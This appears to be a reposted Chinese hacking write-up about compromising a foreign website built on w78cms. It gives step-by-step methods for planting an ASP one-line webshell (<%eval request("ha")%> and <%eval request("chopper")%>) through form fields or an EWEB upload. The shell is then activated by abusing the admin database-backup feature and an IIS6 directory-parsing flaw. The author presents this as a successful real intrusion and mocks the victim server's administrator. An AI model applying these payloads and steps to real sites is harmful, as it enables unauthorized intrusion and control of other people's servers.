网站地图    收藏   

主页 > 后端 > 网站安全 >

w78cms后台拿shell - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 国外的一个站,采用了w78cms程序,貌似这程序还挺少见,发现貌似给人搞过了,百度下前人经验,他们是这样说的:方法一:前提条件:对方未修改数据库的默认地址第一步:订购页面,...

国外的一个站,采用了w78cms程序,貌似这程序还挺少见,发现貌似给人搞过了,百度下前人经验,他们是这样说的:
 
方法一:
前提条件:对方未修改数据库的默认地址
第一步:订购页面,直接在 产品名称,订购数量等输入一句话木马
www.2cto.com <%eval request("ha")%>
第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份
第三步:一句话木马连接,上传shell
 
方法二:
前提条件:对方未修改EWEB的默认路径
第一步:直接在EWEB里上传一个图片后缀的木马。
第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份
第三步:备份后的就是你的shell了
然后发现节操掉了一地,这个站是新版的程序,已经对后台备份数据库的后缀做了限制,这下牛逼了,备份肯定行不通了。然后上传组件也被人删掉了,情何以堪啊。在备份的时候抓包了一下,发现提交了一个隐藏参数,备份目录,应该能使用iis6的解析漏洞
 
在友情链接那里除了序号,其他都填上一句话:
 
<%eval request("chopper")%>
然后在备份处,拦截备份提交的数据,加一个名为1.asp的子目录,然后提交,成功备份得到一个一句话,链接之,搞定。
 
最后吐槽一下这个国外的垃圾服务器,真是防渗透做得好啊,卡到连爹都不认识,不知道挂了几百个网站,管理员真是垃圾,居然还能全盘浏览,给跪了。
 
最后送上老外的一首打油诗
 
If you hack, don’t speak
If you speak, don’t write
If you write, don’t sign
If you sign, don’t be surprised

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论